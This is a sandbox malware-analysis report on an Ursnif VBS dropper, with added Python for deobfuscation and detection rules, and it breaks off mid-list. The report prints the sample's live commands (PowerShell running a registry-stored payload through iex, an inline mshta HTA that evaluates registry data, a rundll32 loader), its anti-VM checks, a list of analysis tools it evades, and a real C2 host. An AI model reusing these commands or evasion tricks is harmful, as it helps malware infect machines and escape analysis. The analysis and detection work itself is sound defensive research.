Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: v8MaHZpVOY2L.vbs Static file information: File size 2145907 > 1048576

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface (AMSI buffer, re-lined; the capture begins and ends mid-statement):
    WScript.Shell")
    Rastus = redden.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "30226" + ".txt"
    If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Rastus) Then
        Jason = (258 - ((954 - 688.0) - (51 + (-43.0))))
    Else
        REM export Schwartz pellet Josephus prophesy probabilist Medford transcript Indoeuropean, 6902325 midwives bazaar origin faceplate oersted dividend monologue furthermore Westminster, 2587295 gyrocompass capstone
        Jason = (((39 + 29.0) + (46 + 282.0)) - 395.0)
    End If
    forborne = Jason
    REM guarantee Paraguayan strand, fogy reap Zeiss broad penal provision sociometry Fresno remembrance condolence Philistine41 wall status dock
    End Function

    Function minus()
        GxzLW("DEBUG: FS_FCC - Start")
        ' octave rhododendron intuition. sac pediment. tail telescopic syringe aggravate wallet Lyon too
        on error resume next
        ' Atlantis boulder phrasemake feed wardrobe. schlieren trainman maldistribute hindsight pentecostal Bodleian bedroom Nippon stoppage deflect,
        Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")
        Set MDQ = wdhWF.ExecQuery("Select * from Win32_Processor", , (607 - (567 - ((88 + (-13.0)) + (-67.0)))))
        For Each giantess In MDQ
            If giantess.NumberOfCores < (((68 + 1.0) - 14.0) + (-(4146 - 4094.0))) Then
                fossiliferous = True
                REM trouser Indiana whee, cotman knockout screenful Marriott Miles Rothschild lingual southpaw sportswriting torque. Lebesgue imperate decree Israelite duress megabyte
                GxzLW("DEBUG: FS_FCC - False")
            End If
            REM rangy share humpty z conundrum. binocular Howell Worcestershire inferno ionosphere inferno370 phi mobcap corrigible downwind expression
        Next
        If fossiliferous Then
            OSWm
        End If
        REM gestation average poverty saturater met longue. Pericles eohippus Aug impose, desist demurring stream594 withheld expound Eastman
        GxzLW("DEBUG: FS_FCC - True")
        REM Doherty Goodman wart smug oppressive, paraboloid stifle assiduous gummy. material quest revelry
    End Function

    Function guerrilla()
        GxzLW("DEBUG: FS_CM - Start")
        on error resume next
        ' bug famish batik antennae afforest112 cherubim browbeaten pidgin Fujitsu midband. barbarism jot Harbin sod
        Dim qjbJl,sturgeon
        qjbJl=6000
        sturgeon=3000
        Randomize
        WScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)
        Set wdhWF = GetObject("winmgmts:\\.\root\cimv2")
        Set MDQ = wdhWF.ExecQuery("Select * from Win32_ComputerSystem")
        ' none slice cowpox summertime camelback testicular ogle lumen, marketplace grail caramel believe
        For Each giantess In MDQ
            FOC = FOC + Int((giantess.TotalPhysicalMemory) / (1048865 - ((3614 - 2.0) - (3356 - 33.0))))
        Next
        If FOC < (98 + ((1314 - (73 + 252.0)) - 57.0)) Then
            GxzLW("DEBUG: FS_CM - False")
            REM Sousa Peloponnese curmudgeon joke Benson Auckland desideratum draw Cornwall ghastly gavotte, invidious, direct
            OSWm
        End If
        GxzLW("DEBUG: FS_CM - True")
    End Function

    Function gGXl()
        REM hat runt ultimatum physician maul. slang parliament Albert pyridine. 5714460 postoperative libertine scholastic nothing421 plethora Mycenaean flunk peaceable oriental
        GxzLW("DEBUG: FS_TD1 - Start")
        GxzLW("DEBUG: FS_TD2 - Start"

    Note on the arithmetic: every parenthesised expression above is a constant. Folded, the ExecQuery flags argument is 48 (wbemFlagReturnImmediately Or wbemFlagForwardOnly), the processor check is NumberOfCores < 3, the memory divisor is 1048576 (bytes to MiB) and the RAM check is FOC < 1030 MiB; Jason is 0 when %USERPROFILE%\Downloads\30226.txt exists and 1 otherwise, and the sleep before the Win32_ComputerSystem query is a random 3000 to 6000 ms. A failed core or RAM check calls OSWm, which lies outside the captured buffer. The REM and ' lines are dictionary-word filler with no effect on execution.
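The constant obfuscation in the captured script is mechanical enough to undo automatically. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it constant-folds the innermost purely numeric parenthesised groups until none remain (so the arithmetic is evaluated by walking the AST, never by eval()) and drops the whole-line REM / ' filler comments. The sample input is the report's own captured lines, re-lined; nothing else about the script is assumed.

```python
# Added example (not part of the Joe Sandbox report or the sample): constant-folds the
# arithmetic obfuscation seen in the AMSI capture above and drops the filler REM/' comments.
import ast
import operator
import re
from typing import List

# A number, optionally signed (a folded negative result is re-inserted as e.g. -43).
NUM = r"[-+]?\d+(?:\.\d+)?"
# Innermost parenthesised group built only from numbers and + - * /: no nested parentheses
# and no identifiers, so string arguments and calls such as Int(...) are never touched.
INNER_RE = re.compile(rf"\(\s*{NUM}(?:\s*[-+*/]\s*{NUM})*\s*\)")
# Whole-line filler comments ("REM ..." or "' ...") that pad the script with dictionary words.
COMMENT_RE = re.compile(r"^\s*(?:REM\b|')", re.IGNORECASE)

_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv,
    ast.USub: operator.neg, ast.UAdd: operator.pos,
}


def _safe_eval(expr: str) -> float:
    """Evaluate a purely numeric expression by walking its AST (no eval())."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported construct in {expr!r}")
    return walk(ast.parse(expr, mode="eval"))


def _fmt(value: float) -> str:
    """Render integral results as integers so '(954 - 688.0)' folds to 266, not 266.0."""
    return str(int(value)) if float(value).is_integer() else repr(float(value))


def fold_constants(line: str) -> str:
    """Replace innermost numeric groups with their value until none remain.

    Each pass removes one pair of parentheses, so the loop always terminates.
    """
    while True:
        m = INNER_RE.search(line)
        if m is None:
            return line
        value = _safe_eval(m.group(0)[1:-1])
        line = line[:m.start()] + _fmt(value) + line[m.end():]


def deobfuscate(script: str) -> List[str]:
    """Drop blank and filler-comment lines, fold constants on the rest."""
    return [fold_constants(ln) for ln in script.splitlines()
            if ln.strip() and not COMMENT_RE.match(ln)]


# Re-lined excerpt of the AMSI capture shown in the report (sample input, not new code).
SAMPLE = r'''
If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Rastus) Then
    Jason = (258 - ((954 - 688.0) - (51 + (-43.0))))
Else
    REM export Schwartz pellet Josephus prophesy probabilist Medford transcript
    Jason = (((39 + 29.0) + (46 + 282.0)) - 395.0)
End If
Set MDQ = wdhWF.ExecQuery("Select * from Win32_Processor", , (607 - (567 - ((88 + (-13.0)) + (-67.0)))))
If giantess.NumberOfCores < (((68 + 1.0) - 14.0) + (-(4146 - 4094.0))) Then
' octave rhododendron intuition. sac pediment. tail telescopic syringe
WScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)
FOC = FOC + Int((giantess.TotalPhysicalMemory) / (1048865 - ((3614 - 2.0) - (3356 - 33.0))))
If FOC < (98 + ((1314 - (73 + 252.0)) - 57.0)) Then
'''

if __name__ == "__main__":
    for folded in deobfuscate(SAMPLE):
        print(folded)
```

Run against the excerpt, the core threshold folds to `NumberOfCores < 3`, the divisor to `1048576`, the RAM threshold to `FOC < 1030` and the ExecQuery flags to `48`; the `WScript.Sleep Int((qjbJl-sturgeon+1)*Rnd+sturgeon)` line is left alone because its parentheses contain identifiers. Groups inside string literals would also be folded, which is harmless for this sample but worth knowing before running it over a script that builds strings arithmetically.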
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress, 28_2_702E1D62
PE file contains an invalid checksum
Source: beneficial.odt.2.dr Static PE information: real checksum: 0xadda3 should be: 0xa6e2d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2210 push ecx; ret 28_2_702E2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2263 push ecx; ret 28_2_702E2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447E1F push ecx; ret 28_2_04447E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447AB0 push ecx; ret 28_2_04447AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_0444B1DE push esp; iretd 28_2_0444B26C

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\beneficial.odt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\beneficial.odt

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\v8mahzpvoy2l.vbs
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (78 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (12 occurrences)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXEHK
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXEXU
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXEZ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6508
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1288 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708 Thread sleep time: -4611686018427385s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_7030E9E0 IsDebuggerPresent,DebuggerProbe, 28_2_7030E9E0
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress, 28_2_702E1D62
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702F0890 __NMSG_WRITE,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_702F0890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702F8230 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_702F8230

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: beneficial.odt.2.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Progmanlock
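The process chain recorded in this report (wscript.exe creating processes through WMI, mshta.exe running an inline about:<hta:application> that regread()s its payload, powershell.exe passing a registry value to iex, csc.exe compiling from a response file under %LOCALAPPDATA%\Temp, and rundll32 loading a .odt module via DllRegisterServer) is what the Sigma hits above key on. The following Python is an added example, not part of the Joe Sandbox report or of any vendor's rule set: detection logic run over process-creation events. The events are constructed from the command lines in the report; the field names, and the choice of WmiPrvSE.exe as parent for the processes that wscript.exe created via Win32_Process::create (the report lists that parent as "unknown"), are assumptions.

```python
# Added example (not part of the Joe Sandbox report): process-creation detection logic for the
# wscript -> WMI -> mshta -> powershell -> csc / rundll32 chain recorded above. Events are
# constructed from the command lines in the report; field names and the WmiPrvSE.exe parent
# of the WMI-created processes are assumptions, not report data.
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    cmdline: str


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
WMI_CHILDREN = SHELLS | {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

# "iex ( ... (gp 'HKCU:...').Prop ...)": script body pulled out of the registry and executed.
REG_IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b.*\b(?:gp|get-itemproperty)\b\s+['\"]?hkcu:", re.I)
# Inline HTA passed on the command line instead of an .hta file, reading its payload via regread().
HTA_INLINE_RE = re.compile(r"about:<hta:application>.*<script>.*\.regread\(", re.I | re.S)
# csc.exe driven by a response file (@file) that lives under the user's Temp directory.
CSC_TEMP_RE = re.compile(r"@['\"]?[^'\"\s]*\\appdata\\local\\temp\\", re.I)
# rundll32 <module>,<export>
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\s,\"]+)\"?\s*,\s*(\w+)", re.I)
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches, in a fixed order."""
    parent, image, cmd = _base(ev.parent_image), _base(ev.image), ev.cmdline
    hits = []
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawns_shell")
    if image == "mshta.exe" and HTA_INLINE_RE.search(cmd):
        hits.append("mshta_inline_hta_regread")
    if image in {"powershell.exe", "pwsh.exe"} and REG_IEX_RE.search(cmd):
        hits.append("powershell_iex_from_registry")
    if image == "csc.exe" and CSC_TEMP_RE.search(cmd):
        hits.append("csc_response_file_in_temp")
    if image == "rundll32.exe":
        m = RUNDLL_RE.search(cmd)
        # A module that is not a .dll, or that lives in Temp, is the loader pattern seen here.
        if m and (not m.group(1).lower().endswith(".dll") or TEMP_RE.search(m.group(1))):
            hits.append("rundll32_suspicious_module")
    if parent == "wmiprvse.exe" and image in WMI_CHILDREN:
        hits.append("wmi_spawned_process")
    return hits


def scan(events) -> List[Tuple[int, str, str]]:
    """(pid, image, rule) for every hit across a batch of events."""
    return [(ev.pid, _base(ev.image), rule) for ev in events for rule in evaluate(ev)]


# Constructed events; command lines are the ones recorded in the report.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'"),
    ProcEvent(2, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(3, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
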